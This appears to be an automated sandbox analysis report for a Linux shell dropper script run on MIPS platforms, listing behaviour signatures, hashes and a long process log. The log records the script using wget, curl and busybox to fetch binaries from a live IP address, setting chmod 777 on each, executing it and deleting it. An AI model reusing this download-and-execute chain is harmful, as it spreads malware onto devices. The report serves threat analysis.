Analysis Overview
SHA256
5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518
Threat Level: Shows suspicious behavior
The file 5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 02:45
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-20 02:45
Reported
2024-11-20 02:48
Platform
debian9-mipsbe-20240611-en
Max time kernel
96s
Max time network
94s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
Processes
/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/chmod
[chmod 777 me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17
[./me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/rm
[rm me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/wget
[wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/chmod
[chmod 777 GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF
[./GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/bin/rm
[rm GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF]
/usr/bin/wget
[wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/chmod
[chmod 777 JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug
[./JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
/bin/rm
[rm JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-20 02:45
Reported
2024-11-20 02:48
Platform
debian9-mipsel-20240611-en
Max time kernel
94s
Max time network
97s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | N/A |
| N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | N/A |
| N/A | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | N/A |
| N/A | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | N/A |
| N/A | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | N/A |
| N/A | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | N/A |
| N/A | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | N/A |
| N/A | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | N/A |
| N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | N/A |
| N/A | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | N/A |
| N/A | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | N/A |
| N/A | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/GMhxl5wHXRS78ZxxUEojcwBAcKgYqNRVZF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC | /usr/bin/curl | N/A |
| File opened for modification | /tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz | /usr/bin/curl | N/A |
| File opened for modification | /tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI | /usr/bin/curl | N/A |
| File opened for modification | /tmp/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/JrQ7v48KUbBAuB5XwxdXts2fqLV8sSyQug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6 | /usr/bin/curl | N/A |
Processes
/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh
[/tmp/5e1c33ea279105c302ec4665ddd72c155d9d440ae2c473b803df701c30002518.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/chmod
[chmod 777 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/tmp/25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2
[./25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/bin/rm
[rm 25rlz5Twbw5ZJKlGiFYuvc7HBM7xOztnZ2]
/usr/bin/wget
[wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/chmod
[chmod 777 UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/tmp/UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5
[./UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/bin/rm
[rm UJoip0Yfq9Y9AyFCJa1ISX8hL6hX0GDhx5]
/usr/bin/wget
[wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/chmod
[chmod 777 Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/tmp/Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX
[./Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/bin/rm
[rm Av2kF07j7TD1Z98A5QTPBdBIZQgIAcTmeX]
/usr/bin/wget
[wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/chmod
[chmod 777 kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/tmp/kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW
[./kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/bin/rm
[rm kLf10Zypb6DCuHTUFWcjOZSmiutxNJVkHW]
/usr/bin/wget
[wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/chmod
[chmod 777 l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/tmp/l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI
[./l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/bin/rm
[rm l95ASuFmLcNSOdvE9RcuWyaJad7Y26j6gI]
/usr/bin/wget
[wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/chmod
[chmod 777 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/tmp/6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE
[./6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/bin/rm
[rm 6kZs5wwxTPH8Mr4NXZgr9rqQN0iaX04loE]
/usr/bin/wget
[wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/chmod
[chmod 777 U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/tmp/U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC
[./U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/bin/rm
[rm U2yS6hyWg0BtnOfCVT5oRgLRz6xnyfaRZC]
/usr/bin/wget
[wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/chmod
[chmod 777 vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/tmp/vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz
[./vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/bin/rm
[rm vGRTUa0HSiU3aQWDlk09w6rZ5wwtOyojrz]
/usr/bin/wget
[wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/chmod
[chmod 777 zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/tmp/zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6
[./zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/bin/rm
[rm zZtCZZddeduS2oaAFtibNooqfJ99ts5rf6]
/usr/bin/wget
[wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/chmod
[chmod 777 idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/tmp/idkMoRXMipMhw22wQsyL92ITpIX97fCPFV
[./idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/bin/rm
[rm idkMoRXMipMhw22wQsyL92ITpIX97fCPFV]
/usr/bin/wget
[wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/chmod
[chmod 777 p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/tmp/p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783
[./p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/bin/rm
[rm p0kIRyTOChVSgScoUjN6uyn1hVsFgIq783]
/usr/bin/wget
[wget http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/me2BWCTnZgdEwDCPbp1gfsX6qBPXNAqL17]
/bin/busybox
